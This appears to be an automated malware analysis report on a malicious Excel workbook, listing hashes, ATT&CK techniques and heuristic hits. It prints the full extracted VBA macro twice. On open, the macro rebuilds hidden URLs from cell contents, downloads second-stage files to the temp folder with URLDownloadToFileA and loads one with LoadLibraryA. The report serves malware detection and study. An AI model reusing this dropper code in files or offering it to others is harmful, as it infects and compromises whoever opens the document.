Office (OLE) malware analysis — malicious · 85efbeb17d8e366e

MALICIOUS

Office (OLE)

123.5 KB Created: 2020-02-10 10:41:43 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: a8af9448db3633caaa99b48015414002 SHA-1: 2a9a76c3d9b61ca8c302244bb1853269b1f6c52c SHA-256: 85efbeb17d8e366e0f67d21fecc3fc754ecb997ee2033682f47cb0da38439c02

188 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is an Excel file containing a Workbook_Open VBA macro. This macro utilizes the URLDownloadToFileA API to download a second-stage payload from a remote source, likely to a temporary directory, and then uses LoadLibraryA to execute it. The document body content appears to be unrelated filler text, suggesting the macro is the primary malicious component.

Heuristics 5

Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

#If Win64 And VBA7 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib "Urlmon" (ByVal one As LongPtr, ByVal two As String, ByVal three As String, ByVal four As LongPtr, ByVal five As LongPtr) As LongPtr
Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal two As String) As LongPtr

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Public Sub Workbook_Open()
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3748 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3748 bytes
SHA-256: `71215c6fa7fc327cb4dd95be71d2bafc2bcbaeac91a6c8cc46d9f1a92bb1f2ab`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True #If Win64 And VBA7 Then Private Declare PtrSafe Function URLDownloadToFileA Lib "Urlmon" (ByVal one As LongPtr, ByVal two As String, ByVal three As String, ByVal four As LongPtr, ByVal five As LongPtr) As LongPtr Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal two As String) As LongPtr Private Declare PtrSafe Function FreeLibrary Lib "kernel32" (ByVal two As LongPtr) As Integer Private Declare PtrSafe Function GetTempPathA Lib "kernel32" (ByVal one As LongPtr, ByVal two As String) As Integer #Else #If Win64 Then Private Declare PtrSafe Function URLDownloadToFileA Lib "Urlmon" (ByVal one As LongPtr, ByVal two As String, ByVal three As String, ByVal four As LongPtr, ByVal five As LongPtr) As LongPtr Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal two As String) As LongPtr Private Declare PtrSafe Function FreeLibrary Lib "kernel32" (ByVal two As LongPtr) As Integer Private Declare PtrSafe Function GetTempPathA Lib "kernel32" (ByVal one As LongPtr, ByVal two As String) As Integer #Else Private Declare Function URLDownloadToFileA Lib "Urlmon" (ByVal one As Long, ByVal two As String, ByVal three As String, ByVal four As Long, ByVal five As Long) As Long Private Declare Function LoadLibraryA Lib "kernel32" (ByVal two As String) As Long Private Declare Function FreeLibrary Lib "kernel32" (ByVal two As Long) As Integer Private Declare Function GetTempPathA Lib "kernel32" (ByVal one As Long, ByVal two As String) As Integer #End If #End If Dim u As String Dim b As String Dim s As String Dim c As String Dim pp As String Dim v As String Dim d As String Dim inte As Integer Public Sub Workbook_Open() ActiveSheet.Shapes("Picture 1").Delete u = Sheets("Sheet1").Range("C4") b = Sheets("Sheet1").Range("C10") s = b v = Mid(u, 23, 2) c = v v = Mid(u, 37, 2) c = c + v v = Mid(u, 67, 1) c = c + v v = Mid(u, 53, 2) c = c + v v = Mid(u, 75, 12) c = c + v v = Mid(u, 111, 1) c = c + v v = Mid(u, 117, 3) c = c + v v = Mid(u, 137, 1) c = c + v pp = c v = Mid(u, 8, 1) pp = pp + v #If Win64 And VBA7 Then Call cccc #Else #If Win64 Then Call cccc #Else v = Mid(u, 2, 1) c = c + v inte = GetTempPathA(512, s) v = Mid(b, 53, 8) b = Mid(s, 1, inte) d = b b = b + v v = d + Mid(d, 5, 1) URLDownloadToFileA 0, c, b, 0, 0 URLDownloadToFileA 0, pp, v, 0, 0 Dim ulng As Long ulng = LoadLibraryA(b) FreeLibrary ulng #End If #End If End Sub Public Sub cccc() v = Mid(u, 13, 1) c = c + v inte = GetTempPathA(512, s) v = Mid(b, 53, 8) b = Mid(s, 1, inte) d = b b = b + v v = d + Mid(d, 5, 1) URLDownloadToFileA 0, c, b, 0, 0 URLDownloadToFileA 0, pp, v, 0, 0 Dim ulng As LongPtr ulng = LoadLibraryA(b) FreeLibrary ulng End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Worksheet_SelectionChange(ByVal Target As Range) End Sub

SHA-256: 71215c6fa7fc327cb4dd95be71d2bafc2bcbaeac91a6c8cc46d9f1a92bb1f2ab

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

#If Win64 And VBA7 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib "Urlmon" (ByVal one As LongPtr, ByVal two As String, ByVal three As String, ByVal four As LongPtr, ByVal five As LongPtr) As LongPtr
Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal two As String) As LongPtr
Private Declare PtrSafe Function FreeLibrary Lib "kernel32" (ByVal two As LongPtr) As Integer
Private Declare PtrSafe Function GetTempPathA Lib "kernel32" (ByVal one As LongPtr, ByVal two As String) As Integer
#Else
#If Win64 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib "Urlmon" (ByVal one As LongPtr, ByVal two As String, ByVal three As String, ByVal four As LongPtr, ByVal five As LongPtr) As LongPtr
Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal two As String) As LongPtr
Private Declare PtrSafe Function FreeLibrary Lib "kernel32" (ByVal two As LongPtr) As Integer
Private Declare PtrSafe Function GetTempPathA Lib "kernel32" (ByVal one As LongPtr, ByVal two As String) As Integer
#Else
Private Declare Function URLDownloadToFileA Lib "Urlmon" (ByVal one As Long, ByVal two As String, ByVal three As String, ByVal four As Long, ByVal five As Long) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal two As String) As Long
Private Declare Function FreeLibrary Lib "kernel32" (ByVal two As Long) As Integer
Private Declare Function GetTempPathA Lib "kernel32" (ByVal one As Long, ByVal two As String) As Integer
#End If

#End If

Dim u As String
Dim b As String
Dim s As String
Dim c As String
Dim pp As String
Dim v As String
Dim d As String
Dim inte As Integer

Public Sub Workbook_Open()

ActiveSheet.Shapes("Picture 1").Delete

u = Sheets("Sheet1").Range("C4")
b = Sheets("Sheet1").Range("C10")
s = b
v = Mid(u, 23, 2)
c = v
v = Mid(u, 37, 2)
c = c + v
v = Mid(u, 67, 1)
c = c + v
v = Mid(u, 53, 2)
c = c + v
v = Mid(u, 75, 12)
c = c + v
v = Mid(u, 111, 1)
c = c + v
v = Mid(u, 117, 3)
c = c + v
v = Mid(u, 137, 1)
c = c + v
pp = c
v = Mid(u, 8, 1)
pp = pp + v

#If Win64 And VBA7 Then
Call cccc
#Else
#If Win64 Then
Call cccc
#Else
v = Mid(u, 2, 1)
c = c + v
inte = GetTempPathA(512, s)
v = Mid(b, 53, 8)
b = Mid(s, 1, inte)
d = b
b = b + v
v = d + Mid(d, 5, 1)
URLDownloadToFileA 0, c, b, 0, 0
URLDownloadToFileA 0, pp, v, 0, 0
Dim ulng As Long
ulng = LoadLibraryA(b)
FreeLibrary ulng
#End If
#End If
End Sub


Public Sub cccc()
v = Mid(u, 13, 1)
c = c + v
inte = GetTempPathA(512, s)
v = Mid(b, 53, 8)
b = Mid(s, 1, inte)
d = b
b = b + v
v = d + Mid(d, 5, 1)
URLDownloadToFileA 0, c, b, 0, 0
URLDownloadToFileA 0, pp, v, 0, 0
Dim ulng As LongPtr
ulng = LoadLibraryA(b)
FreeLibrary ulng
End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Worksheet_SelectionChange(ByVal Target As Range)

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.